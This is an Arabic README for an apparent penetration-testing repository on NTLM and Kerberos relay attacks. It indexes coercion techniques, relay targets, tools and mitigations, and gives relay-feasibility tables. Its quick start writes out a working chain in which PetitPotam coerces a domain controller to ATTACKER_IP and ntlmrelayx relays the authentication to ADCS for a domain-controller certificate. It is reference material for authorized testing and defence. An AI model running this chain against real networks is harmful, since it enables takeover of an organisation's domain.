
مرجع تقني لتقنيات الترحيل المتعددة
# الكتاب المقدس للترحيل — دليل اختبار الاختراق الداخلي للترحيل مرجع شامل لهجمات الترحيل NTLM أثناء اختبارات الاختراق الداخلية المصرح بها. يغطي أساسيات المصادقة، تقنيات الإكراه، أهداف الترحيل لكل بروتوكول، الأدوات، التسلسل المتقدم، والتخفيفات الدفاعية. ## المتطلبات الأساسية - مضيف هجوم لينكس (Kali، Parrot، أو ما شابه) - Python 3.10+ مع تثبيت Impacket - وصول شبكي إلى البيئة المستهدفة (مهمة مصرح بها) - فهم أساسي لـ Active Directory وشبكات Windows ## جدول المحتويات ### 1. الأساسيات - [نظرية مصادقة NTLM والترحيل](https://github.com/rootsecdev/relay_bible/blob/main/01-fundamentals/ntlm-authentication.md) — كيف يعمل NTLM، لماذا الترحيل ممكن، NTLMv1 مقابل v2، التوقيع، EPA - [نظرية مصادقة Kerberos والترحيل](https://github.com/rootsecdev/relay_bible/blob/main/01-fundamentals/kerberos-authentication.md) — تبادل AS/TGS/AP، توحيد SPN، لماذا Kerberos لا يزال قابلًا للترحيل - [تحديد فرص الترحيل](https://github.com/rootsecdev/relay_bible/blob/main/01-fundamentals/identifying-targets.md) — التعداد، إيجاد المضيفين بدون توقيع، رسم خريطة سطح الهجوم ### 2. تقنيات الإكراه - [نظرة عامة على الإكراه](https://github.com/rootsecdev/relay_bible/blob/main/02-coercion/overview.md) — إجبار الأجهزة على المصادقة على المستمع الخاص بك - [PetitPotam (MS-EFSRPC)](https://github.com/rootsecdev/relay_bible/blob/main/02-coercion/petitpotam.md) - [PrinterBug / SpoolSample (MS-RPRN)](https://github.com/rootsecdev/relay_bible/blob/main/02-coercion/printerbug.md) - [DFSCoerce (MS-DFSNM)](https://github.com/rootsecdev/relay_bible/blob/main/02-coercion/dfscoerce.md) - [ShadowCoerce (MS-FSRVP)](https://github.com/rootsecdev/relay_bible/blob/main/02-coercion/shadowcoerce.md) ### 3. أهداف الترحيل (حسب البروتوكول) - [ترحيل SMB](https://github.com/rootsecdev/relay_bible/blob/main/03-relay-targets/smb.md) — الترحيل إلى SMB لتنفيذ الأوامر - [ترحيل LDAP / LDAPS](https://github.com/rootsecdev/relay_bible/blob/main/03-relay-targets/ldap.md) — تفويض الوصول، إنشاء حسابات الأجهزة، RBCD - [ترحيل MSSQL](https://github.com/rootsecdev/relay_bible/blob/main/03-relay-targets/mssql.md) — الترحيل إلى SQL Server لتنفيذ الأوامر - [ترحيل HTTP / WebDAV](https://github.com/rootsecdev/relay_bible/blob/main/03-relay-targets/http-webdav.md) — الترحيل إلى نقاط النهاية الويب، إكراه WebDAV - [هجمات ADCS (ESC1–ESC15)](https://github.com/rootsecdev/relay_bible/blob/main/03-relay-targets/adcs.md) — جميع تقنيات تصعيد ADCS بما في ذلك الترحيل - [ترحيل SMTP / IMAP](https://github.com/rootsecdev/relay_bible/blob/main/03-relay-targets/smtp-imap.md) — الترحيل إلى خدمات Exchange/البريد - [ترحيل RPC / DCOM](https://github.com/rootsecdev/relay_bible/blob/main/03-relay-targets/rpc-dcom.md) — الترحيل إلى نقاط نهاية RPC - [ترحيل وكيل SOCKS](https://github.com/rootsecdev/relay_bible/blob/main/03-relay-targets/socks.md) — الحفاظ على جلسات الترحيل المستمرة عبر SOCKS ### 4. إعداد الأدوات واستخدامها - [Responder](https://github.com/rootsecdev/relay_bible/blob/main/04-tools/responder.md) — التسميم والتقاط التجزئات - [ntlmrelayx.py](https://github.com/rootsecdev/relay_bible/blob/main/04-tools/ntlmrelayx.md) — إطار الترحيل الأساسي - [mitm6](https://github.com/rootsecdev/relay_bible/blob/main/04-tools/mitm6.md) — الاستيلاء على DNS عبر IPv6 للإكراه - [Certipy](https://github.com/rootsecdev/relay_bible/blob/main/04-tools/certipy.md) — تعداد ADCS والترحيل - [Coercer](https://github.com/rootsecdev/relay_bible/blob/main/04-tools/coercer.md) — أداة الإكراه الآلية - [krbrelayx](https://github.com/rootsecdev/relay_bible/blob/main/04-tools/krbrelayx.md) — ترحيل Kerberos وإساءة استخدام التفويض ### 5. التقنيات المتقدمة - [الترحيل عبر البروتوكولات](https://github.com/rootsecdev/relay_bible/blob/main/05-advanced-techniques/cross-protocol.md) — الترحيل من بروتوكول إلى آخر - [سلاسل هجوم IPv6](https://github.com/rootsecdev/relay_bible/blob/main/05-advanced-techniques/ipv6-chains.md) — مجموعات mitm6 + الترحيل - [تسلسل الترحيل والتنقل](https://github.com/rootsecdev/relay_bible/blob/main/05-advanced-techniques/chaining.md) — سيناريوهات الترحيل متعددة القفزات - [خدعة إكراه WebDAV](https://github.com/rootsecdev/relay_bible/blob/main/05-advanced-techniques/webdav-coercion.md) — إجبار مصادقة HTTP من الأجهزة - [ترحيل Kerberos عبر إساءة استخدام CNAME DNS](https://github.com/rootsecdev/relay_bible/blob/main/05-advanced-techniques/kerberos-cname-relay.md) — Cymulate / CVE-2026-20929، ترحيل TGS Kerberos عبر تسميم CNAME ### 6. الدفاع والكشف - [التخفيفات](https://github.com/rootsecdev/relay_bible/blob/main/06-defense/mitigations.md) — توقيع SMB، توقيع LDAP، EPA، تعطيل NTLM - [الكشف](https://github.com/rootsecdev/relay_bible/blob/main/06-defense/detection.md) — مصادر السجلات، قواعد Sigma، المؤشرات السلوكية --- ## مرجع سريع: ترحيل NTLM — ما الذي يمكن ترحيله إلى أين؟ ينطبق على ترحيل NTLM التقليدي في البيئات الحديثة المصححة (ما بعد CVE-2019-1040). للحصول على تحليل مفصل عبر البروتوكولات، راجع [الترحيل عبر البروتوكولات](https://github.com/rootsecdev/relay_bible/blob/main/05-advanced-techniques/cross-protocol.md). | مصدر المصادقة | → SMB | → LDAP | → MSSQL | → HTTP | → ADCS | → SOCKS | |-------------|-------|--------|---------|--------|--------|---------| | SMB | ✅* | ❌† | ✅ | ✅ | ❌† | ✅ | | HTTP | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ | | WebDAV | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ | | MSSQL | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ | \* يجب ألا يتطلب الهدف توقيع SMB † يتضمن NTLM القادم من SMB علامات توقيع في NEGOTIATE، وهو ما يفرضه LDAP و ADCS HTTP — مما يؤدي إلى أن الجلسة المرحلة تحتاج إلى مفتاح توقيع لا يمتلكه المهاجم. لهذا السبب يُفضّل استخدام المصادقة القادمة من WebDAV/HTTP لترحيل LDAP و ADCS. ## مرجع سريع: ترحيل Kerberos عبر إساءة استخدام CNAME DNS بدائية Cymulate / **CVE-2026-20929** (يناير 2026) — يقوم المهاجم بتسميم DNS بـ CNAME، ويقوم Windows بتوحيد SPN، ويطلب العميل TGS للهدف الذي اختاره المهاجم، ثم يتم ترحيل AP-REQ. نظرًا لأن العديد من الخدمات تقبل التذاكر بناءً فقط على جزء **DNS** من SPN، فإن فئة SPN المصدرية أقل أهمية بكثير مما هي عليه في ترحيل NTLM — ما يحدد نجاح الهجوم هو ما إذا كانت الخدمة المستهدفة تفرض عنصر التحكم الخاص بها في مكافحة الترحيل. | الخدمة المستهدفة | قابل للترحيل ما لم... | التصحيح / الحالة | |----------------------|-------------------------------------------------------------|---------------------------------------------| | SMB | توقيع SMB **مطلوب** على الهدف | — | | LDAP | توقيع LDAP **مطلوب** | — | | LDAPS | `LdapEnforceChannelBinding = 2` (دائمًا) | — | | HTTP / IIS | فرض HTTP CBT (التحقق من رمز `HTTP.sys` = مطلوب) | **CVE-2026-20929** يعيد فرض HTTP.sys CBT | | ADCS `/certsrv/` | الحماية الموسعة = مطلوبة على vdir | ينطبق فرض HTTP.sys CBT عبر CVE-2026-20929 | | MSSQL | الحماية الموسعة مفعلة | — | | Exchange (OWA/ECP/…) | EPA على جميع الأدلة الافتراضية | — | جميع الصفوف تفترض أن المهاجم لديه موقف شبكي لتسميم DNS (DHCPv6 عبر mitm6، ARP، DHCPv4 المارقة). للتقنية الكاملة: [ترحيل Kerberos عبر إساءة استخدام CNAME DNS](https://github.com/rootsecdev/relay_bible/blob/main/05-advanced-techniques/kerberos-cname-relay.md). ## بداية سريعة 1. **التعداد** — ابحث عن المضيفين مع تعطيل التوقيع وحدد أهداف الإكراه 2. **الموضع** — ابدأ مستمع الترحيل الخاص بك (ntlmrelayx) مشيرًا إلى هدفك 3. **الإكراه** — قم بتشغيل المصادقة من جهاز مصدر إلى المستمع الخاص بك 4. **الاستفادة** — يقوم الترحيل بالتقاط المصادقة وإعادة توجيهها إلى بروتوكول هدفك ``` # مثال كلاسيكي: إكراه وحدة التحكم بالمجال، الترحيل إلى ADCS للحصول على شهادة وحدة التحكم بالمجال ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController python3 PetitPotam.py ATTACKER_IP DC_IP ```